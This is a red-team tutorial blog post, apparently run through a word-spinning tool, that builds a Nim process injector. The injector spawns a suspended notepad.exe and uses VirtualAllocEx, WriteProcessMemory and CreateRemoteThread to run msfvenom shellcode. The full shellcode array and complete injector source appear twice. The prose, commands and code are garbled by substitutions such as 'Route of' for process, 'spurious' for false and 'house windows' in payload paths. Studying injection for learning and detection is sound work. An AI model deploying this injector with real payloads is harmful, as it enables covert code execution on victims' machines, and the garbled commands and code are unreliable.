Nim on the Assault: Route of Injection The exercise of Nim and the Windows API

by

Time: 45mins – 1hr

Narrate: Beginner Plus – Intermediate

Abilities: Exploit Pattern, Programming, Malware Analysis

Shameless Self Inch: Hiya! Prefer more grunt love this? I’m on the Twitters now! Give me a convention for cat pics and malware trend.

Would truly like to procure into intro stage exploit trend, but don’t essentially know the set apart to originate up? Learn on, fam!

I changed into observing a truly smartly shot, smartly lit video of Gordon Ramsay making scrambled eggs as soon as. He stated one thing that stuck with me, to the tune of “when we procure a brand fresh cook in the kitchen, I continuously like them produce scrambled eggs as their first task. If they’ll enact that simple task masterfully, I know they’re correct.”

I don’t know if that’s precise or now not, but to the total aspiring exploit devs and red teamers in the market: in describe for you to procure into exploit trend, but maybe don’t know the set apart to originate up, in this submit I’m going to coach you the precise system to produce scrambled eggs.

Enter, Nim and the Windows API

As a red teamer and exploit developer, while you occur to can procure your arms on a straightforward, easy language that helps you to govern considerable primitives to enact, you know you’re cooking with fuel.

To me, nothing exemplifies that paradigm bigger than Nim. Nim is a lesser acknowledged language on the time of writing this submit, on the choice hand it has gradually grown in reputation amongst red teamers for a possibility of reasons. I mediate here is as a result of it excels in about a recount exercise cases that red teamers in total admire:

  • Nim’s language syntax is as straightforward as it will get.
  • Nim can inappropriate collect to produce payloads on each and each Windows and Linux.
  • When Nim compiles for Windows, it produces payloads that are cramped.
  • Out the sphere, Nim has sizable compatibility with the Windows API. And in describe for you to procure even more performance out of it, you can exercise the notorious winim library.

What follows in this submit is an exploration of a total a ways off task injection exploit (truly, the most total one which exists) that you might perhaps fabricate from scratch using Nim. Within the spirit of a most up-to-date Rasta Mouse submit and the excellent OffensiveNim repo by byt3bl33d3r, I desired to toss my HuskyHat in the sector and inappropriate-glance some streams of excellent favorite study and add my obtain point of view.

That is to remark that very tiny of the grunt of this submit is favorite study by me, but I’d take to veil the self-discipline to coach some very total exploit trend concepts and the precise system to work with the Windows API.

And on the dwell, I’m going to enact some light malware RE and set apart apart this system by a debugger so we can look for what this plot looks love under a microscope.

That is ceaselessly a big alternative to soar into intro exploit trend can like to you’re going to don’t must already, so let’s procure going!

You’ll Need

  • A trend workstation. Nim can inappropriate-collect for Linux and Windows so it doesn’t matter which one you purchase. Genuine hang the one you’re more cheerful with.
  • A sufferer take a look at Windows host, 64-bit.
  • Visual Studio Code set apart apart in for your trend workstation. On the time of writing this, Nim doesn’t like a truly constructed-in trend setting, on the choice hand it does like some candy VS Code plugins that procure you about 90% of an IDE’s aspects.
  • Nim! Grab the installer and install it for your dev workstation. Within the event you are using *nix, take a look at the kit installer alternate suggestions here for a one-liner install.
  • (if rising on Linux) Secure definite you’re going to need the Minimalist GNU for Windows compiler (MinGW). Fairly about a Linux distros already like this, but can like to you don’t, precise enter
$ sudo honest install mingw-w64

Setup (~5 mins)

For this lab, I’m using Linux Lite for my trend VM. Lite is an Ubuntu-based mostly mostly Linux OS that in all fairness nice to make exercise of. However this would presumably well also composed work on any distro can like to you’re deving on Linux, precise practice the directions for the install illustrious above.

So can like to you’re following along on Ubuntu, speed:

$ sudo honest-procure install nim

… and let the set up speed. Once the set up is entire, take a look at that it set apart apart in precisely by coming into:

$ nim -h

If the usage prints to masks masks, candy! Let’s retain going.

There are about a sizable libraries that we’re going to exercise on our escapades this day. To raise them, enter:

$ nimble install winim zippy nimcrypto

This is in a position to presumably well also exercise Nim’s kit supervisor to raise these from their repositories. Within the event you look for a suggested love:

Instructed: No native applications.json found, bag it from web? [y/N]

…you can enter ‘y’ and it will bag the kit manifest.

Next, install Visual Studio Code. There are a entire bunch of methods to enact this making an try to obtain your OS, so I’ll leave it as an exercise for the reader can like to you’re using Windows or a Linux distro that is now not Ubuntu based mostly mostly. The easy means for me has been:

$ sudo honest-procure install snapd -y
$ sudo snap install code --traditional
$ /snap/bin/code &

Whenever you’re going to need it set apart apart in, produce definite to install about a of the good Nim language plugins. To enact so, trail to the Extension panel…

and search “nim”…

The 2 highlighter above are the precise ones on the time of writing this submit. Try one, or the assorted, or each and each! They’ll wait on out, trust me. To put in them, precise click the blue “install” button in the main panel.

Alright, we like our (pseudo) IDE and our language pack set apart apart in. Let’s procure to exploitin!

Surely, first, let’s enact the standard. Convey it with me now…

Hiya, world! (5 mins, now not even)

You’ll obtain that Hiya, World! in Nim is the most straightforward it will get. And this would presumably well also give us an precise primer on the precise system to gather the executable, which would perhaps presumably well also be subtle in the initiating glimpse.

Secure a brand fresh directory for your desktop and procure in contact with it Nim, or per chance a pun on the determine love Nimble or theNimtasticVoyage. It truly doesn’t matter.

Then, inner of this folder, produce a brand fresh file called hello.nim. In Code, your extension(s) might perhaps presumably well also composed determine it as a Nim file by giving it impartial a tiny crown icon.

In hello.nim, enter:

# Hiya World!
echo "Hiya, World!"

… and assign! That’s it. No, truly. No longer unfriendly, huh?

So what enact we enact with this now? Effectively, Nim is a compiled language, so it produces executables to speed our programs. To gather our cramped tiny Hiya World program, launch a terminal and navigate to your Nim directory. Once in there, enter the next:

$ nim c -d:mingw --cpu:amd64 hello.nim

…the set apart:

  • nim c is the Nim compiler tell,
  • -d:mingw denotes a ‘elaborate’ flag, which in this case is telling the compiler to make exercise of the Minimalist GNU for Windows compiler to make the executable for house windows,
  • --cpu:amd64 tells the compiler to gather for a customary 64-bit Windows OS, and,
  • hello.nim is, needless to remark, our file to gather!

If all goes smartly, it can most likely also composed look love it does below:

…then can like to you look for your Nim directory…

Eye at that, a new fresh Hiya World portable executable! Now transfer it over to your Windows take a look at VM and speed it from the terminal!

I love it when a opinion comes together.

SO… we’ve now viewed about a of the chilly aspects of Nim in trudge. You haven’t viewed considerable of the Nim syntax but, so it’s too early to list how easy it’s a ways to program in, but you now know that you might perhaps inappropriate-collect it from Linux to Windows, collect it correct down to a conveyable executable, and speed it on a Windows host with tiny effort.

With that under our belts, let’s circulation onto the main direction: scrambled eggs.

A Straightforward Route of Injector: VirtualAllocEx + WriteProcessMemory + CreateRemoteThread (~30 mins)

We’re about to pop the hood of Windows and originate up working with the APIs that produce Windows tick. Within the event you’ve never done this sooner than, it might perhaps well actually presumably well seem intimidating in the initiating. However I’m here to list you that the fundamentals must now not too unfriendly.

Acquire this readily available and ready to reference, you’ll need it: https://docs.microsoft.com/en-us/house windows/discover32/api/

What we’re about to fabricate is the most straightforward of task injection tactics. And love Rasta’s sizable submit referenced above on enforcing this plot in C#, it’s a ways mainly as stealthy as a flying lawnmower. However as an intro to working with the Windows API, it’s nice. I’ll present as we trail.

Alright, let’s procure it.

Secure a brand fresh file called injector.nim. Inner injector.nim, we originate up by importing two libraries:

import winim/lean
import osproc

Both of these are predominant for being ready to pop the hood of Windows and work with the considerable API primitives that we can exercise to break havoc.

Let’s originate up with the dwell in mind here. What we’re planning to enact is:

  • Spawn a benign task in a suspended state.
  • Create an house of memory inner this task the set apart we can stage some shellcode.
  • Secure this house of memory ready to procure this shellcode.
  • Write out shellcode bytes into this memory house, and
  • Rupture our shellcode by rising and running a brand fresh thread in this task.

So precise off the bat, we’ll need some shellcode. Let’s retain it straightforward and spawn calc.exe. To generate this, we can exercise tried and precise msfvenom. I’m using the code below but, and here is crucial, enact now not trust strangers on the win. Generate your obtain shellcode for this.

┌──(kali㉿kali)-[~]
└─$ msfvenom -p house windows/x64/exec CMD="C:WindowsSystem32calc.exe" -f csharp                   2 ⨯
[-] No platform changed into chosen, picking Msf::Module::Platform::Windows from the payload
[-] No arch chosen, selecting arch: x64 from the payload
No encoder specified, outputting uncooked payload
Payload size: 296 bytes
Final size of csharp file: 1531 bytes
byte[] buf = fresh byte[296] {
0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x43,0x3a,0x5c,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x5c,0x53,0x79,0x73,0x74,0x65,0x6d,0x33,
0x32,0x5c,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00 };

Listing the exercise of the csharp layout. We exercise this as a result of it’s an much like how the byte array must be formatted in Nim.

Back in injector.nim, we can implant this into our code:

import winim/lean
import osproc
# $ msfvenom -p house windows/x64/exec CMD="C:WindowsSystem32calc.exe" -f csharp
var shellcode: array[296, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x43,0x3a,0x5c,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x5c,0x53,0x79,0x73,0x74,0x65,0x6d,0x33,
0x32,0x5c,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00]

Listing the cramped differences between the msfvenom output and what will get placed into the array.

Now, let’s elaborate the meat and potatoes of our progam: the injector arrangement!

We are in a position to elaborate a arrangement that will call the substances of our scrambled eggs:

  • A suspended task.
  • The VirtualAllocEx API feature to make a online page online of memory and enable us to jot down into it.
  • The WriteProcessMemory API feature that will purchase our shellcode and write it into the specified house of memory, and,
  • The CreateRemoteThread API feature that will originate up a thread in this suspended task to procure the shellcode.

So let’s originate up with the arrangement (a feature, by any varied determine), which is able to purchase an enter of a byte array that will pass in our shellcode.

import winim/lean
import osproc
# $ msfvenom -p house windows/x64/exec CMD="C:WindowsSystem32Calc.exe" -f csharp
var shellcode: array[296, byte] = [ ....
-- snip--
# Our main procedure
proc injector[I, T](shellcode: array[I, T]): void =
    echo "[*] Let's trail to work!"
# TODO:
    # Originate up and suspend a task
    # Inaugurate the task so we can procure entry to it with a take care of
    # Call VirtualAllocEx to produce some memory house
    # Call WriteProcessMemory to jot down shellcode into the memory
    # Call CreateRemoteThread to procure a thread with the shellcode stuffed in it
    # POG when it works
# Kick off the main module
when isMainModule:
    injector(shellcode)

Secure definite to hear to your indentation as you write the code. In a total sense, without getting means too in the weeds, Nim must like fixed indentation and whitespace. It’s an much like Python in this regard. Genuine retain it to 1 tab for each and each high stage arrangement, two tabs for a block of code within that, and heaps others. The pseudo-IDE might perhaps presumably well also composed purchase care of varied this for you.

Let’s originate up our task and suspend it precise out the gate:

# TODO:
    # Originate up and suspend a task
    let injectedProcess = startProcess("notepad.exe")
    injectedProcess.suspend()
    echo "[*] Suspended Route of: ", injectedProcess.processID

Nim’s osproc library makes this a snap by aliasing about a API calls. So we can purchase good thing about that by simply calling startProcess and the suspend() system to produce our life straightforward. Now, we’ll like a brand fresh notepad.exe task in a suspended state, ready for our trickery.

Next on the TODO:

    # Inaugurate the task so we can procure entry to it with a take care of
    let processHandle = OpenProcess(
        PROCESS_ALL_ACCESS,
        spurious,
        cast[DWORD](injectedProcess.processID)
    )
    echo "[*] Our injected task take care of: ", processHandle

What exactly is going down here? Nim’s winim library is set to position in work, son.

A Primer on the Windows API

Winim is a library that simplifies the task of writing Nim code that can exercise the Windows API. In this regard, it’s impartial a tiny love its C# brother, P/Invoke. Within the event you’re now not aware of P/Invoke, it mainly goes love this: there are a entire bunch of API capabilities readily available to the developer that dwell inner varied parts of the Windows working system. In describe for you to make exercise of those API calls whereas writing in C#, you can import them using P/Invoke. It’s mainly love adding a plot of the APIs you’re going to like to make exercise of precise into your code, so your program can realize the precise system to interact with the Windows API while you occur to fabricate it. You might perhaps presumably well presumably also obtain more info about P/Invoke here, I advocate it might perhaps well actually presumably well you’re attracted to learning to procure in C#.

Briefly, we’re going to make exercise of a library of capabilities that enable our Nim code to procure entry to the Windows API without moderately various headache.

Back to the Nim code, we are using the winim library to invoke a Windows API feature called OpenProcess. Per the docs, the parameters are love this:

HANDLE OpenProcess(
  DWORD dwDesiredAccess,
  BOOL  bInheritHandle,
  DWORD dwProcessId
);

Breaking it down, it needs:

  • A parameter for your required procure entry to stage to the task. For us, we are soliciting for PROCESS_ALL_ACCESS.
  • A ture/spurious flag to inherit a take care of or now not. We set apart this to spurious for our capabilities.
  • And, a parameter to point it to the task ID of the one we settle on the take care of for.

And most importantly, the return imprint says that if this call succeeds, it returns the value of the launch take care of for our specified task. We settle on this with a operate to jot down shellcode and hack the total things.

That’s it! No longer so unfriendly, I mediate. We are in a position to mainly wash, rinse, and repeat for each and each API call in describe to procure these considerable primitives to enact our soiled work for us.

Let’s retain it rolling with VirtualAllocEx:

    # Call VirtualAllocEx to produce some memory house
    let memPointer = VirtualAllocEx(
        processHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )

That is our first API call the set apart things truly purchase a turn for the faulty. Per the docs, you want:

LPVOID VirtualAllocEx(
  HANDLE hProcess,
  LPVOID lpAddress,
  SIZE_T dwSize,
  DWORD  flAllocationType,
  DWORD  flProtect
);

Which, in English, translates to:

  • The technique take care of for the house the set apart we want to make memory house.
  • The pointer of the take care of the set apart to originate up this memory house. We’ll leave this NULL to let the API figure it out for us.
  • The size of the memory wanted. For this, we cast the scale of our shellcode array (296 bytes) as the value.
  • The form of memory allocation, which we want to be MEM_COMMIT. This will get technical but mainly methodology to mumble the house for the memory and allocate the house in a single step.
  • Sooner or later, the permissions. That is the risk zone, as a result of we’re asking the task to allocate RWX memory into the task. That is an sizable red flag from an OPSEC point of view, but for our capabilities, yolo.

Transferring on, time to jot down into the task memory. Consulting the docs for WriteProcessMemory, we reach up with:

    # Call WriteProcessMemory to jot down shellcode into the memory
    # A variable for our shellcode byte array size:
    var bytesWritten: SIZE_T
    let writeProccess = WriteProcessMemory(
        processHandle,
        memPointer,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )

We can, needless to remark, add some echos to print out about a key info to the terminal. The favorite shellcode_bin.nim POC that I’m using as a reference point has some nice toddler liners to wait on here:

    echo "[*] WriteProcessMemory: ", bool(writeProccess)
    echo "    \-- bytes written: ", bytesWritten
    echo ""

Sooner or later, for the enormous finale: calling CreateRemoteThread. Within the event you’ve ever tried to procure by a metal detector with a bazooka for your coat, you might perhaps presumably well presumably admire what calling CreateRemoteThread looks love from a defensive point of view. I’d wager any EDR solution value its salt is monitoring the exercise of this API call, and for correct operate.

All over again, consult the docs and here is what we reach up with:

    # Call CreateRemoteThread to procure a thread with the shellcode stuffed in it
    let threadHandle = CreateRemoteThread(
        processHandle,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](memPointer),
        NULL,
        0,
        NULL
    )
    # POG when it works
    echo "[+] Thread Take care of: ", threadHandle
    echo "[*] POG"

Help the resolution to the main diagram on the bottom. Once all looks correct, collect:

$ nim c -d:mingw --cpu:amd64 inject.nim

If all goes smartly, it can most likely also composed collect cleanly and produce inject.exe:

Now zip the PE up and produce it to your Windows take a look at VM of preference. This is in a position to presumably well also absolutely set apart off Windows Defender, so retain that in mind.

And now, for the second of truth…

Girls folk and Gents, we like POG.

Within the event you were unable to spawn calc, take a look at your inject.nim file. I like integrated the code for the total ingredient on the bottom of this submit, so trail take a look at it in the market in describe for you a sanity take a look at.

Some Gentle Malware Analysis

However hello, don’t stop there! Let’s launch that task up and glance the assorted attributes linked to our injection.

A elephantine malware prognosis of this pattern is beyond the scope of this module, on the choice hand it’s for trot considerable to seem within the binary for the API calls that we precise utilized. Grab Route of Hacker and x64dbg and pop the hood of the executable:

We can obtain the entry point to this system moderately effortlessly. If we inquire the string references of our API calls, we can obtain each and each and set apart breakpoints to debug:

Then, step into this system and diagram each and each API enact its ingredient. Within the event you hear to the Route of Hacker output and restart about a cases, you might perhaps presumably well pinpoint exactly the set apart Predominant is named and look for the Notepad.exe task spawn:

Spawning Notepad
The suspended Notepad task with RWX memory and no corresponding memory module.

Then, step over the assorted calls to the “inject” feature to search out each and each instruction responsible for each and each API call.

There are varied OPSEC concerns for this plot and each other time I will yowl Rasta’s submit out. Hasten take a look at it out for more info.

Summary

In this lab, we like:

  • Realized about Nim, an absorbing programming that mixes easy syntax with the flexibility to gather down tosmall Windows portable executables.
  • Wrote Hiya, World!
  • Realized in regards to the Windows APIs and the precise system to invoke them inner your program.
  • Passe the APIs to compose a total task injection plot, and,
  • Examined about a of the artifacts with some total malware prognosis instruments to search spherical for if we would also obtain the API calls whereas debugging this system.

As continuously, thank you for reading! I hope you truly liked making an try out some intro exploit trend.

Would You Esteem To Know More?

I’m on the Twitters now! Be aware me can like to you’d love more grunt love this. I’m also continuously readily available for questions, comments, and wisecracks at huskyhacks.mk[@]gmail.com, so please ship me messages there too.


Beefy inject.nim File

import winim/lean
import osproc
# $ msfvenom -p house windows/x64/exec CMD="C:WindowsSystem32Calc.exe" -f csharp
var shellcode: array[296, byte] = [
byte 0xfc,0x48,0x83,0xe4,0xf0,0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,
0x51,0x56,0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,0x48,
0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,0x4a,0x4d,0x31,0xc9,
0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,
0x01,0xc1,0xe2,0xed,0x52,0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,
0x01,0xd0,0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,0x01,
0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,0xd0,0xe3,0x56,0x48,
0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,
0xac,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,
0x24,0x08,0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,0xd0,
0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,0xd0,0x41,0x8b,0x04,
0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,
0x41,0x5a,0x48,0x83,0xec,0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,
0x8b,0x12,0xe9,0x57,0xff,0xff,0xff,0x5d,0x48,0xba,0x01,0x00,0x00,0x00,0x00,
0x00,0x00,0x00,0x48,0x8d,0x8d,0x01,0x01,0x00,0x00,0x41,0xba,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,
0xd5,0x48,0x83,0xc4,0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,
0x47,0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5,0x43,0x3a,0x5c,
0x57,0x69,0x6e,0x64,0x6f,0x77,0x73,0x5c,0x53,0x79,0x73,0x74,0x65,0x6d,0x33,
0x32,0x5c,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x00]
# Our main arrangement
proc injector[I, T](shellcode: array[I, T]): void =
    echo "[*] Let's trail to work!"
# TODO:
    # Originate up and suspend a task
    let injectedProcess = startProcess("notepad.exe")
    injectedProcess.suspend()
    echo "[*] Suspended Route of: ", injectedProcess.processID
    # Inaugurate the task so we can procure entry to it with a take care of
    let processHandle = OpenProcess(
        PROCESS_ALL_ACCESS,
        spurious,
        cast[DWORD](injectedProcess.processID)
    )
    echo "[*] Our injected task take care of: ", processHandle
    # Call VirtualAllocEx to produce some memory house
    let memPointer = VirtualAllocEx(
        processHandle,
        NULL,
        cast[SIZE_T](shellcode.len),
        MEM_COMMIT,
        PAGE_EXECUTE_READ_WRITE
    )
    # Call WriteProcessMemory to jot down shellcode into the memory
    # A variable for our shellcode byte array size:
    var bytesWritten: SIZE_T
    let writeProccess = WriteProcessMemory(
        processHandle,
        memPointer,
        unsafeAddr shellcode,
        cast[SIZE_T](shellcode.len),
        addr bytesWritten
    )
    echo "[*] WriteProcessMemory: ", bool(writeProccess)
    echo "    \-- bytes written: ", bytesWritten
    echo ""
    # Call CreateRemoteThread to procure a thread with the shellcode stuffed in it
    let threadHandle = CreateRemoteThread(
        processHandle,
        NULL,
        0,
        cast[LPTHREAD_START_ROUTINE](memPointer),
        NULL,
        0,
        NULL
    )
    # POG when it works
    echo "[+] Thread Take care of: ", threadHandle
    echo "[*] POG"
# Kick off the main module
when isMainModule:
    injector(shellcode)

References: